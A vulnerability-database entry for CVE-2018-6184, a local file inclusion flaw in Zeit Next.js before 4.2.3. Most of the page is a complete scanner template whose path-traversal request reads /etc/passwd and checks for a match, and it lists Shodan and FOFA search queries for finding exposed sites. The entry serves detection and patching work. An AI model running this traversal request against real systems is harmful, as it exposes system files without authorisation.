CVE-2018-6184: Zeit Next.js <4.2.3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Zeit Next.js | POC: 已公开

漏洞描述

Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2018-6184

info:
  name: Zeit Next.js <4.2.3 -  Local File Inclusion
  author: DhiyaneshDK
  severity: high
  description: |
    Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
  remediation: |
    Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability.
  reference:
    - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/NextFrameworkPathTraversal.java
    - https://github.com/zeit/next.js/releases/tag/4.2.3
    - https://nvd.nist.gov/vuln/detail/CVE-2018-6184
    - https://github.com/lnick2023/nicenice
    - https://github.com/masasron/vulnerability-research
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-6184
    cwe-id: CWE-22
    epss-score: 0.49051
    epss-percentile: 0.97708
    cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeit
    product: next.js
    shodan-query:
      - html:"/_next/static"
      - http.html:"/_next/static"
      - cpe:"cpe:2.3:a:zeit:next.js"
    fofa-query: body="/_next/static"
  tags: cve2018,cve,nextjs,lfi,traversal,zeit

http:
  - method: GET
    path:
      - "{{BaseURL}}/_next/../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204ba405a0eeb2ea9a9fdacbd7005eb38d0222b2265123c5d8e7b480e258c1db630220705b4acea6f8861f83f51f730adf6c16a378e77d325eeb319fd26354949d38f2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐